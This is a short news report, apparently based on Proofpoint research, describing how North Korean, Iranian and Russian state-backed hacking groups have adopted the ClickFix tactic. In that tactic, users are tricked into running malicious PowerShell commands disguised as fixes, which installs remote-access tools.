State-sponsored hacking groups from Iran, North Korea, and Russia have been increasingly utilizing the ClickFix tactic in targeted malware campaigns since late 2024, according to research from Proofpoint. This tactic, previously associated with cybercrime, has now been adopted by nation-state actors to aid in the deployment of malware. Several prominent groups, including Kimsuky (TA427), MuddyWater (TA450), and APT28 (TA422), have been identified using this technique to infiltrate victim systems, bypassing traditional security measures by deceiving users into running malicious commands disguised as system fixes.
The ClickFix technique involves convincing users to copy and paste malicious PowerShell commands into their systems, often presented as solutions to technical issues. For instance, Kimsuky utilized this method in January and February 2025 to target individuals within the think tank sector. The attackers initiated contact with victims and eventually directed them to a malicious website, where they were instructed to execute the harmful PowerShell command. This led to the installation of the Quasar RAT, giving the attackers remote access to the compromised machines.
Similarly, the Iranian group MuddyWater employed ClickFix in November 2024 to install remote monitoring software, Level, by persuading targets to run a PowerShell command with administrator privileges. The malware enabled persistent access, facilitating espionage and data theft with a specific focus on the Middle East, particularly the United Arab Emirates and Saudi Arabia. Additionally, the Russian group UNK_RemoteRogue utilized a compromised Zimbra server to distribute malicious links that initiated the ClickFix sequence.
The prevalence of the ClickFix tactic among multiple state-sponsored groups underscores its increasing popularity among nation-state actors, as indicated by Proofpoint’s research. The persistence of this method suggests that it is likely to be extensively used by these groups in the future, with the potential for adoption by other actors as well.
In conclusion, the evolution of cyber threats continues to pose significant challenges in the realm of cybersecurity. The adaptation of cybercrime techniques by nation-state actors emphasizes the need for continuous vigilance and robust defense mechanisms to counter such malicious activities. As technology advances, it is crucial for organizations and individuals to stay informed about emerging threats and adopt proactive measures to safeguard their systems and data from sophisticated cyber attacks.